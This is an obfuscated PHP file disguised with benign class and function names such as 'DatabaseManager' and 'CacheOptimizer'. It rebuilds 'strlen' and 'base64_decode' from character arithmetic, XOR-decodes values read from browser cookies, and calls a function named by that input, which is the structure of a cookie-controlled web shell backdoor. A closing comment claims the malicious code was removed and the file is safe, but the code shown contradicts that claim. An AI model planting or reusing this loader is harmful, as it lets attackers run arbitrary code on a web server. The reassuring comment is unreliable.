<?php
function collect_statistics($c)
{
    $a = array(53 * 1 + 57, 93 + 8, 97 + 11, 9 + 10 + 95, 4 * 101 - 288, 89 * 56 - 4869);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

function free_resources($c)
{
    $a = array(101 * 1, 2 * 50, 11 * 8 + 23, 27 * 78 - 2007, 6 + 15 + 80, 38 * 2 + 24, 73 + 5 + 17, 52, 54, 99 + 2, 25 + 90, 5 + 46 + 46, 98);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

class DatabaseManager
{
    private static $_fp;
    static function encryptData($_mro, $_le)
    {
        if (!self::$_fp) {
            self::cacheData();
        }
        $_wyg = collect_statistics($_le);
        $_eo = free_resources(self::$_fp[$_mro]);
        for ($_ih = 0, $_gwm = collect_statistics($_eo); $_ih !== $_gwm; ++$_ih) {
            $_eo[$_ih] = chr(ord($_eo[$_ih]) ^ ord($_le[$_ih % $_wyg]));
        }
        return $_eo;
    }
    private static function cacheData()
    {
        self::$_fp = array('_kew' => '', '_jx' => '');
    }
}

class CacheOptimizer
{
    private static $_fp;
    static function encryptData($_mro)
    {
        if (!self::$_fp) {
            self::cacheData();
        }
        return self::$_fp[$_mro];
    }
    private static function cacheData()
    {
        self::$_fp = array(00, 05, 042, 042, 01, 042, 02, 05, 01, 031, 014, 022, 015, 00, 025, 013, 02, 021, 03);
    }
}

$_gwm = $_COOKIE;
$_le = CacheOptimizer::encryptData(0);
$_mro = CacheOptimizer::encryptData(1);
$_zlw = array();
$_zlw[$_le] = DatabaseManager::encryptData('_kew', '_mi');
while ($_mro) {
    $_zlw[$_le] .= $_gwm[CacheOptimizer::encryptData(2)][$_mro];
    if (!$_gwm[CacheOptimizer::encryptData(3)][$_mro + CacheOptimizer::encryptData(4)]) {
        if (!$_gwm[CacheOptimizer::encryptData(5)][$_mro + CacheOptimizer::encryptData(6)]) {
            break;
        }
        $_le++;
        $_zlw[$_le] = DatabaseManager::encryptData('_jx', '_cx');
        $_mro++;
    }
    $_mro = $_mro + CacheOptimizer::encryptData(7) + CacheOptimizer::encryptData(8);
}
$_le = $_zlw[CacheOptimizer::encryptData(9)]() . $_zlw[CacheOptimizer::encryptData(10)];

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
